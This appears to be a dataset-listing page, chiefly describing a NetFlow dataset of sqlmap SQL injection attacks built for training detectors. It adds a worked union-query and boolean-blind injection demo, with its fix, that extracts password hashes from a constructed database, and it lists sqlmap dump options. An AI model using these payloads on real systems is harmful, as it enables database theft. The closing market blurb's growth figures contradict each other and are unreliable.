Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Introduction
This dataset contains SQL injection attacks (SQLIA) as malicious NetFlow data. The attacks carried out are union-query SQL injection and blind SQL injection, performed with the sqlmap tool.
NetFlow traffic was generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for collecting and monitoring network traffic flow data. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.
Datasets
The first dataset (D1) was collected to train the detection models; the second (D2) was collected using attacks different from those used in training, in order to test the models and check that they generalize.
Both datasets contain benign and malicious traffic, and both are balanced.
The version of NetFlow used to build the datasets is 5.
Dataset | Aim | Samples | Benign / malicious traffic |
---|---|---|---|
D1 | Training | 400,003 | 50% / 50% |
D2 | Test | 57,239 | 50% / 50% |
Infrastructure and implementation
Two sets of flow data were collected with DOROTHEA, a Docker-based framework for NetFlow data collection that lets you build interconnected virtual networks to generate and collect flow data with the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator node with the ipt_netflow sensor installed. The sensor is a Linux kernel module hooked in through iptables, which processes the packets and aggregates them into NetFlow flows.
DOROTHEA is configured to use NetFlow v5 and to export a flow after it has been inactive for 15 seconds (inactive timeout) or active for 1800 seconds (30 minutes; active timeout). A connection that outlives the active timeout therefore appears as several consecutive flow records rather than one.
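As an added worked example (not part of DOROTHEA or of the dataset), here is a parser for the NetFlow v5 datagrams such a setup exports, together with a constructed sample datagram holding two attacker-to-victim flows and one benign SSH flow. The addresses follow the D1 ranges described below; packet counts, byte counts and timestamps are invented. The duration check shows how the 1800-second active timeout surfaces in the data: a record whose last-minus-first span reaches the timeout was cut by the exporter and the session continues in a later record.

```python
import socket
import struct

# Wire layouts from Cisco's NetFlow v5 specification (big-endian, no padding).
V5_HEADER = struct.Struct("!HHIIIIBBH")                 # 24 bytes
V5_RECORD = struct.Struct("!4s4s4sHHIIIIHHBBBBHHBBH")   # 48 bytes per flow
HEADER_FIELDS = ("version", "count", "sys_uptime", "unix_secs", "unix_nsecs",
                 "flow_sequence", "engine_type", "engine_id", "sampling_interval")
RECORD_FIELDS = ("srcaddr", "dstaddr", "nexthop", "input", "output", "dPkts",
                 "dOctets", "first", "last", "srcport", "dstport", "pad1",
                 "tcp_flags", "prot", "tos", "src_as", "dst_as", "src_mask",
                 "dst_mask", "pad2")
ACTIVE_TIMEOUT_MS = 1800 * 1000   # DOROTHEA's active timeout (30 minutes)


def parse_v5(packet: bytes) -> dict:
    """Decode one NetFlow v5 export datagram into a header dict and a list of flow dicts.

    Raises ValueError on a wrong version or on a length that does not match the
    advertised record count, so truncated or non-v5 datagrams are rejected early.
    """
    if len(packet) < V5_HEADER.size:
        raise ValueError("datagram shorter than a v5 header")
    header = dict(zip(HEADER_FIELDS, V5_HEADER.unpack_from(packet, 0)))
    if header["version"] != 5:
        raise ValueError(f"not NetFlow v5 (version={header['version']})")
    expected = V5_HEADER.size + header["count"] * V5_RECORD.size
    if len(packet) != expected:
        raise ValueError(f"expected {expected} bytes for {header['count']} records, got {len(packet)}")
    flows = []
    for i in range(header["count"]):
        offset = V5_HEADER.size + i * V5_RECORD.size
        rec = dict(zip(RECORD_FIELDS, V5_RECORD.unpack_from(packet, offset)))
        for key in ("srcaddr", "dstaddr", "nexthop"):
            rec[key] = socket.inet_ntoa(rec[key])
        # first/last are exporter uptime in milliseconds, so duration is their difference.
        rec["duration_ms"] = rec["last"] - rec["first"]
        # A flow whose duration reaches the active timeout was cut by the exporter;
        # the underlying session continues in a following record.
        rec["cut_by_active_timeout"] = rec["duration_ms"] >= ACTIVE_TIMEOUT_MS
        flows.append(rec)
    return {"header": header, "flows": flows}


def is_valid_v5(packet: bytes) -> bool:
    """True if parse_v5 accepts the datagram; handy for filtering a raw capture."""
    try:
        parse_v5(packet)
        return True
    except ValueError:
        return False


def build_v5(flows: list, sys_uptime: int = 2_000_000, unix_secs: int = 1_700_000_000,
             flow_sequence: int = 0) -> bytes:
    """Encode flow dicts (keys as in parse_v5 output) into a v5 datagram.

    Used here only to construct sample input; an exporter such as ipt_netflow
    emits the same layout on the wire.
    """
    body = b""
    for f in flows:
        body += V5_RECORD.pack(
            socket.inet_aton(f["srcaddr"]), socket.inet_aton(f["dstaddr"]),
            socket.inet_aton(f.get("nexthop", "0.0.0.0")),
            f.get("input", 0), f.get("output", 0), f["dPkts"], f["dOctets"],
            f["first"], f["last"], f["srcport"], f["dstport"], 0,
            f.get("tcp_flags", 0), f["prot"], f.get("tos", 0),
            f.get("src_as", 0), f.get("dst_as", 0), f.get("src_mask", 24),
            f.get("dst_mask", 24), 0)
    header = V5_HEADER.pack(5, len(flows), sys_uptime, unix_secs, 0, flow_sequence, 0, 0, 0)
    return header + body


# Constructed sample (values invented): an sqlmap session from an attacker node to a
# victim web form on port 80, seen as two unidirectional flows, plus one benign SSH flow.
SAMPLE_FLOWS = [
    {"srcaddr": "182.168.1.10", "dstaddr": "126.52.30.7", "srcport": 51334, "dstport": 80,
     "prot": 6, "tcp_flags": 0x1b, "dPkts": 4120, "dOctets": 3_145_000, "first": 100_000, "last": 1_900_000},
    {"srcaddr": "126.52.30.7", "dstaddr": "182.168.1.10", "srcport": 80, "dstport": 51334,
     "prot": 6, "tcp_flags": 0x1b, "dPkts": 3980, "dOctets": 12_400_000, "first": 100_000, "last": 1_900_000},
    {"srcaddr": "182.168.1.25", "dstaddr": "126.52.30.40", "srcport": 40022, "dstport": 22,
     "prot": 6, "tcp_flags": 0x1b, "dPkts": 60, "dOctets": 9_800, "first": 150_000, "last": 165_000},
]
SAMPLE_PACKET = build_v5(SAMPLE_FLOWS)

if __name__ == "__main__":
    for flow in parse_v5(SAMPLE_PACKET)["flows"]:
        print(f'{flow["srcaddr"]}:{flow["srcport"]} -> {flow["dstaddr"]}:{flow["dstport"]} '
              f'proto={flow["prot"]} pkts={flow["dPkts"]} bytes={flow["dOctets"]} '
              f'dur={flow["duration_ms"] / 1000:.1f}s cut={flow["cut_by_active_timeout"]}')
```

Because NetFlow flows are unidirectional, the request and response halves of one HTTP session arrive as two records with swapped addresses and ports; a detector that wants per-session features has to pair them itself.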
Benign traffic generation nodes simulate the network traffic of real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. These tasks run as Python scripts; users may customize them or add their own. The network traffic is managed by a gateway with two main tasks: it routes packets to the Internet, and it forwards them to the NetFlow data generation node (packets received from the Internet are handled the same way).
The malicious traffic (SQLI attacks) was generated with sqlmap, a penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities.
The attacks were executed from 16 nodes, each launching sqlmap with the parameters in the following table.
Parameters | Description |
---|---|
--banner, --current-user, --current-db, --hostname, --is-dba, --users, --passwords, --privileges, --roles, --dbs, --tables, --columns, --schema, --count, --dump, --comments | Enumeration options: DBMS banner, current user and database, hostname, DBA status, users, password hashes, privileges, roles, databases, tables, columns, schema, row counts, table contents and comments |
--level=5 | Highest test level: many more payloads and boundaries are tried, and HTTP Cookie, User-Agent and Referer values are tested in addition to GET/POST parameters |
--risk=3 | Highest risk level: adds heavy time-based and OR-based payloads, which raise the chance of extracting data but can modify rows when the injection point sits in an UPDATE or DELETE statement |
--random-agent | Use a randomly chosen HTTP User-Agent header |
--batch | Never ask for user input; take the default answer at every prompt |
--answers="follow=Y" | Pre-answer the "follow redirect?" prompt with yes |
Each attacking node executed SQLIA against 200 victim nodes. The victim nodes deployed a web form vulnerable to union-type injection, connected to either a MySQL or a SQL Server database engine (50% of the victim nodes ran MySQL and the other 50% ran SQL Server).
The web service was reachable on ports 443 and 80, the ports typically used for web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes and 126.52.30.0/24 for the victim nodes.
The malicious traffic in the two datasets was collected under different conditions. For D1, SQLIA used union attacks against the MySQL and SQL Server databases.
For D2, blind SQLIA was performed against the web form connected to a PostgreSQL database, and the IP address spaces also differed from those of D1: 152.148.48.1/24 for the benign and malicious traffic-generating nodes and 140.30.20.1/24 for the victim nodes.
The MySQL server was MariaDB 10.4.12; the other two engines were Microsoft SQL Server 2017 Express and PostgreSQL 13.
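To make concrete what sqlmap does against such a form, in D1 (union query) and in D2 (blind), here is an added example that is not part of the dataset or of its victim forms: a product lookup built by string interpolation beside its parameterized fix, exercised with a union payload and a boolean-blind extraction loop. It uses Python's sqlite3 so it runs offline; the real targets were MariaDB, SQL Server and PostgreSQL, where the same idea needs dialect tweaks (MySQL's `-- ` comment requires a trailing space, which is why sqlmap emits `-- -`; SQL Server and PostgreSQL spell the function SUBSTRING rather than substr). The schema, rows and hash value are constructed for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: the public product lookup the form exposes,
    plus a users table the attacker should never be able to read."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, sku TEXT);
        INSERT INTO products VALUES (1, 'widget', 'W-100'), (2, 'gadget', 'G-200');
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, product_name: str) -> list:
    # The bug: user input becomes part of the statement text.
    sql = f"SELECT name, sku FROM products WHERE name = '{product_name}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, product_name: str) -> list:
    # The fix: the value travels as a bound parameter, never as SQL text.
    return conn.execute(
        "SELECT name, sku FROM products WHERE name = ?", (product_name,)).fetchall()


# Union-query injection: the attacker appends a SELECT with the same column
# count, so rows from another table come back in the form's normal output.
UNION_PAYLOAD = "' UNION SELECT username, password_hash FROM users--"

# Secret the blind attack recovers one character at a time.
SECRET_QUERY = "SELECT password_hash FROM users WHERE username='admin'"


def blind_extract(conn: sqlite3.Connection, lookup, secret_sql: str, length: int) -> str:
    """Boolean-blind extraction: one request per (position, candidate) pair.

    The page answers only 'row found' or 'no row'; the attacker turns that bit
    into a channel by asking whether character i of the secret equals c.
    sqlmap's blind mode works the same way, with a binary search over the charset
    instead of this linear scan.
    """
    charset = "0123456789abcdef"   # enough for a hex digest; sqlmap uses a wider set
    recovered = ""
    for pos in range(1, length + 1):
        for c in charset:
            payload = f"widget' AND substr(({secret_sql}),{pos},1)='{c}'--"
            if lookup(conn, payload):      # true branch: the widget row came back
                recovered += c
                break
        else:
            break   # no candidate matched: injection blocked or charset exhausted
    return recovered


def demo() -> dict:
    """Run both payloads against the vulnerable and the parameterized lookup."""
    conn = make_db()
    return {
        "union_vuln": lookup_vulnerable(conn, UNION_PAYLOAD),
        "union_safe": lookup_safe(conn, UNION_PAYLOAD),
        "blind_vuln": blind_extract(conn, lookup_vulnerable, SECRET_QUERY, 8),
        "blind_safe": blind_extract(conn, lookup_safe, SECRET_QUERY, 8),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

The union attack needs one request and returns whole rows, which is why D1's flows from a single scan are large; the blind attack needs a request per character and candidate, so D2's traffic is many small requests to the same endpoint, a difference a NetFlow-level detector can pick up from packet and byte counts alone.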
MIT Licensehttps://opensource.org/licenses/MIT
License information was derived automatically
NetAttackMix
The NetAttackMix dataset combines normal network traffic with three classes of injection attacks for training and evaluating detection models:
Class | Description |
---|---|
SQL Injection (SQLi) | Attempts to manipulate SQL statements through request parameters. |
Cross-Site Scripting (XSS) | Injection of client-side scripts that execute in the victim's browser. |
Command / OS Injection (CMDi) | Payloads that try to run shell commands on the server, often leading to… |
See the full description on the dataset page: https://huggingface.co/datasets/blnkoff/NetAttackMix.
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Labels of normal and attack classes in the CICIDS-2017 dataset.
https://www.verifiedmarketresearch.com/privacy-policy/
Dynamic Application Security Testing Market was valued at USD 2687.63 Million in 2023 and is projected to reach USD 39.86 Billion by 2031, growing at a CAGR of 24.71% from 2024 to 2031.
Dynamic Application Security Testing Market: Definition/ Overview
Dynamic Application Security Testing (DAST) acts as a security guard for your online applications: it applies real-world attacker techniques to a running application, interacting with it and analysing its behaviour and responses to various inputs, much as a burglar would probe a house, but virtually. DAST tools look for common vulnerabilities such as SQL injection (injecting malicious input into database queries) and cross-site scripting (injecting scripts that steal user data), helping to identify weaknesses before real attackers exploit them.
DAST also covers APIs, and it finds vulnerabilities in running applications that static code analysis may overlook, since it observes the deployed system rather than the source.
Artificial intelligence (AI) will play a larger role in DAST, improving accuracy and efficiency. AI can learn from previous weaknesses and attack patterns, making it better at recognizing new threats, and can automate tasks such as ranking vulnerabilities by severity, allowing security professionals to focus on complicated issues. As APIs become the foundation of modern systems, DAST will evolve to uncover API-specific vulnerabilities; this matters because a compromised API can expose sensitive information or interrupt critical functions.